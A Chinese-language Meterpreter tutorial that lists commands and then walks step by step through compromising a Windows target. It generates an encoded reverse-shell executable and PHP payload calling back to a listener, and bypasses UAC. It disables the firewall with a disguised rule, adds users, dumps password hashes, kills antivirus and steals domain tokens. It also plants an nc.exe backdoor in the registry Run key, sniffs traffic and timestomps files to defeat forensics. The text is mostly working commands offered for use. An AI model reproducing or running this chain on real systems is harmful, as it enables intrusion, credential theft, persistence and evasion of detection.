十、Meterpreter常用命令
1、基本命令(包含meterpreter和msf終端、ruby接口、目標shell交互的命令)
background(進程隱藏至后台)
sessions(查看已經成功獲取的會話,-i 恢復會話)
quit(關閉當前會話)
shell (獲取系統控制台shell,如果目標系統命令行可執行程序不存在或禁止訪問, 則shell命令會出錯)
irb(與Ruby終端交互,調用metasploit封裝好的函數;在irb中還可以添加metasploit附加組件railgun,直接與windows本地API進行交互)
2、文件系統命令(與目標文件系統交互,包括查看、上傳下載、搜索、編輯)
cat(目標系統文件交互)
getwd(獲取目標機當前工作目錄,getlwd本地當前工作工作目錄)
upload(上傳文件或文件夾到目標機 -r 遞歸)
download(從目標機下載文件或文件夾 -r 遞歸)
edit(調用vi編輯器,對目標上的文件進行編輯)
search(對目標機的文件進行搜索)
3、網絡命令(查看目標網絡狀況、連接信息,進行端口轉發等)
ipconfig(獲取目標主機上的網絡接口信息)
portfwd(端口轉發:將目標主機開放但不允許訪問的端口進行轉發)
route(顯示目標主機路由信息)
4、系統命令(查看目標系統信息、對系統進行基本操作等)
ps(查看目標機正在運行的進程信息)
migrate(將meterpreter會話進程遷移到另一個進程內存空間)
execute(在目標機上執行文件)
getpid(當前會話所在進程的pid值)
kill(終結指定的pid程序)
getuid(獲取當前會話用戶名)
sysinfo(獲取系統信息)
shutdown(關閉目標主機)
5、用戶接口命令
screenshot(截獲被控主機當前桌面)
=================================================
隨着windows系統的不斷更新完善,windows對用戶系統的安全力度也在加強。這對我們的滲透,也帶來了不少的麻煩。今天我將帶大家,利用目前流行的 metasploit 框架,繞過一些 UAC 及防火牆的限制,從而達到成功利用的目的!
由於繞過 UAC 的功能需在 meterpreter 的shell 才能實現。因此,我們首先要做的就是取得目標機器的 meterpreter shell 。
生成一個 payload :
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.15.131 lport=4444 -f exe -o /root/virus.exe -e x86/shikata_ga_nai -i 8
將以上生成的 payload 發送給目標機器並讓其執行!
接着,我們在 kali 上配置一個反彈會話處理程序:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.15.131
set LPORT 4444
exploit
這里再介紹一種,生成反彈 shell 的方式。就是直接以 raw 的形式保存成文件只要目標進行了訪問,就會反彈回 shell 。具體生成命令如下:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.15.131 LPORT=4444 -f raw -o x.php
當目標機器成功執行payload后我們就取得了一個 meterpreter shell 。
我們嘗試直接利用 getuid 和 getsystem 命令來提權:
從以上結果我們基本可以判定遭到了 UAC 的用戶訪問控制的攔截!既然這樣,那么我們來利用 meterpreter 的強大功能來進行繞過!
use exploit/windows/local/ask
show options
set session 1
exploit
當我們成功執行以上命令后,我們會在目標系統上彈出一個確認框只要點擊確認即可成功繞過!現在我們再來通過 getuid 和 getsystem 命令來查看當前我們的 shell 權限:
現在我們來通過其 shell 來關閉防火牆:
shell
netsh adcfirewall set allprofiles state off
我們打開防火牆配置查看防火牆已成功被我們關閉!
但是我們可以看出,如果目標管理員查看防火牆配置,發現防火牆被人為關閉,那么必定引起管理員的警惕!因此,我們還可以通過策略的添加,來隱蔽我們的行為。
netsh firewall add portopening TCP 444 “VMWARE” ENABLE ALL
偽裝成一個系統正常的進程,之后遠程重啟目標系統,並利用 NC 連接即可!
run getgui -u xxxxx -p xxxxx 添加用戶
run post/windows/gather/hashdump 獲取加密的用戶名和密碼
開啟3389遠程桌面:
run post/windows/manage/enable_rdp 此命令可以幫我們一建開啟遠程桌面,並幫我們關閉防火牆
還可以使用 run getgui -e 來開啟遠程桌面:
利用該命令,我們還可以在目標機器上添加用戶:
run getgui -u xxxxx -p xxxxx
我們還可以嘗試關閉目標機器上的殺毒軟件:
run killav
對目標系統桌面進行實時截圖:
screenshot
use espia
竊取及偽造域賬戶 token :
load incognito
list_tokens -u
impersonate_token xxxxx\\xxxxxxx
execute -f cmd.exe -i -t
利用注冊表添加 NC 后門:
上傳 NC 到目標系統:
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
枚舉注冊表內容(開機啟動)
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
在該注冊表增加內容(開機啟動)
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d “C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe”
----
或
查看內容是否增加成功:
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
nc連接
>nc 192.168.192.129 222.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator>ls
ls
'ls' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���
C:\Documents and Settings\Administrator>dir
dir
������ C �еľ��� WinXp
��������� 0000-2C28
也可以通過nc.exe再次連接到meterperter
nc 192.168.192.129 222
c:>cd windows
c:windows>start fif.exe
查看metepreter又連接到了。
-----------------------------------
對目標網絡實施嗅探抓包:
加載 sniffer 插件:
load sniffer
對指定網卡進行抓包嗅探:
sniffer_start 9
將抓取的包保存為cap文件:
sniffer_dump 9 1.cap
對抓取的包進行解包:
use auxiliary/sniffer/psnuffle
set pcapfile 1.cap
run
獲取目標系統上的 hash 值:
use post/windows/gather/hashdump
set session 4
run
基於MACE時間的反電子取證:
timestomp -v secist.txt
查看當前目標文件 MACE 時間。
timestomp -f c:\\AVScanner.ini secist.txt (將模板文件MACE時間,復制給當前文件)
timestomp -v secist.txt
